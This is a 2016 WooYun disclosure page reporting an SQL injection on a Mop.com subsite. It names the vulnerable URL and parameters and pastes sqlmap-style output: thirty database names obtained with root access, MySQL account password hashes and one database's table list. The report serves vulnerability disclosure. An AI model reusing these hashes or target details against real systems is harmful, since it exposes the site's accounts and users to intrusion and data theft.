当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192018

漏洞标题:猫扑网某处存在重大安全隐患(整站用户信息泄露+多个网站躺枪)

相关厂商:猫扑

漏洞作者: 路人甲

提交时间:2016-04-03 11:23

修复时间:2016-04-07 11:51

公开时间:2016-04-07 11:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

猫扑网(英语:MOP)的雏形是猫扑大杂烩,是中国知名的中文网络社区之一,拥有注册用户1.3亿人。猫扑网于1997年10月建立。2004年被千橡互动集团并购。2012年,猫扑资产划归至美丽传说。2012年6月7日,美丽传说正式进驻广西南宁。经过短短十余年的发展,目前,它已发展成为集猫扑大杂烩、猫扑贴贴论坛、猫扑小说、猫扑乐加、猫扑游戏、猫扑地方站等产品为一体的综合性富媒体娱乐互动平台。该网站中发明了许多网络词汇,是中国大陆地区网络词汇的发源地之一,为大陆地区影响力较大的论坛之一。

详细说明:

http://lady.mop.com/news/bencandy.php?fid=47&aid=908


QQ截图20160402010630.png


QQ截图20160402010630.png


available databases [30]:
[*] 88chihuo
[*] aimei
[*] ao114
[*] bbsttzbj
[*] empirecms
[*] health_mop
[*] information_schema
[*] jiemeng
[*] lady_mop
[*] mop_health
[*] mop_lady
[*] mop_shanxi
[*] mop_society
[*] mop_yule
[*] mysql
[*] news
[*] performance_schema
[*] pureftpd
[*] society_mop
[*] test
[*] ttzbj
[*] tupianzhan
[*] tzonline
[*] tzonlinecn
[*] wochawang
[*] www.88xgmm.com
[*] www.ao114.com
[*] www.jf14.com
[*] www.qj01.com
[*] yule_mop


ROOT权限 

database management system users password hashes:
[*] ao114 [1]:
    password hash: *3D14C4B19D6321F9E9A0EE1E37B1FDADED689B1C
[*] bbsttzbj [1]:
    password hash: *C01CA338E032ED0AA2AC04226223F422DBC531E7
[*] ftp [1]:
    password hash: *89DED2CC215FEBF4D5077792E8CBF7B3A3CE6A53
[*] jf14 [1]:
    password hash: *C7B7BD7EB71664B3DDBDE6EBBB3A4EE171B0968D
[*] jiemeng [1]:
    password hash: *BC9F7B7F1D7BD835584225D688B5D1E6A3FE4A3D
[*] monkey [1]:
    password hash: *9AFB3F6DEF2EFFD70E5C6EF5A23340A74A5BBBD0
[*] monty [1]:
    password hash: *88C89BE093D4ECF72D039F62EBB7477EA1FD4D63
[*] news [1]:
    password hash: *8851FBC32BC33FB4457EE422E14F44DAB92B32F1
[*] pureftpd [1]:
    password hash: *CEA99BA5D493FF67BE8EEA024D8F58B720C46482
[*] root [1]:
    password hash: NULL
[*] ttys5 [1]:
    password hash: *8126BF01DC40072867592C2EF7500F332A187B51
[*] ttys5bbs [1]:
    password hash: *671C2AAF203600DAABE85B3C9E0F39E89380E301
[*] ttzbj [1]:
    password hash: *E1707AF8DF85200A1400F29DCBC4FAA8F4C8748D
[*] tupianzhan [1]:
    password hash: *401B241361D523927FFE44ED7A42A092971435BB
[*] wochawang [1]:
    password hash: *5B3ACE71D2CAD7446F43A20816D1B0CFC202C88D
[*] www.88xgmm.com [1]:
    password hash: *8B167DAF28FFEB1FF4F8B07A3EE57D5FB764D101
[*] www.qj01.com [1]:
    password hash: *7B8EC4349E6DF6BA3F268ADF85F5DC6B71AC690D


从库中可以看出似乎还有很多其他网站的库

QQ截图20160402010630.png


时间原因 就爬了猫扑一个分站的表

Database: yule_mop
[94 tables]
+--------------------------+
| qb_ad_compete_place      |
| qb_ad_compete_user       |
| qb_ad_config             |
| qb_ad_norm_place         |
| qb_ad_norm_user          |
| qb_admin_menu            |
| qb_alonepage             |
| qb_area                  |
| qb_config                |
| qb_copyfrom              |
| qb_crontab               |
| qb_form_config           |
| qb_form_content          |
| qb_form_content_1        |
| qb_form_content_2        |
| qb_form_content_3        |
| qb_form_content_4        |
| qb_form_content_6        |
| qb_form_module           |
| qb_form_reply            |
| qb_friendlink            |
| qb_friendlink_sort       |
| qb_group                 |
| qb_guestbook_config      |
| qb_guestbook_content     |
| qb_guestbook_sort        |
| qb_hack                  |
| qb_jfabout               |
| qb_jfsort                |
| qb_label                 |
| qb_limitword             |
| qb_memberdata            |
| qb_members               |
| qb_menu                  |
| qb_module                |
| qb_moneycard             |
| qb_moneylog              |
| qb_news_article          |
| qb_news_collection       |
| qb_news_comment          |
| qb_news_config           |
| qb_news_fu_article       |
| qb_news_fu_sort          |
| qb_news_gather_rule      |
| qb_news_keyword          |
| qb_news_keywordid        |
| qb_news_reply            |
| qb_news_report           |
| qb_news_sort             |
| qb_news_special          |
| qb_news_special_comment  |
| qb_news_spsort           |
| qb_olpay                 |
| qb_photo_article         |
| qb_photo_collection      |
| qb_photo_comment         |
| qb_photo_config          |
| qb_photo_fu_article      |
| qb_photo_fu_sort         |
| qb_photo_gather_rule     |
| qb_photo_keyword         |
| qb_photo_keywordid       |
| qb_photo_reply           |
| qb_photo_report          |
| qb_photo_sort            |
| qb_photo_special         |
| qb_photo_special_comment |
| qb_photo_spsort          |
| qb_pm                    |
| qb_propagandize          |
| qb_regnum                |
| qb_template              |
| qb_template_bak          |
| qb_upfile                |
| qb_video_article         |
| qb_video_collection      |
| qb_video_comment         |
| qb_video_config          |
| qb_video_fu_article      |
| qb_video_fu_sort         |
| qb_video_gather_rule     |
| qb_video_keyword         |
| qb_video_keywordid       |
| qb_video_reply           |
| qb_video_report          |
| qb_video_sort            |
| qb_video_special         |
| qb_video_special_comment |
| qb_video_spsort          |
| qb_vote_comment          |
| qb_vote_config           |
| qb_vote_element          |
| qb_vote_topic            |
| qb_yzimg                 |
+--------------------------+


然后就要被拉出去补课了QAQ

漏洞证明:

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-07 11:51

厂商回复:

忽略

最新状态:

暂无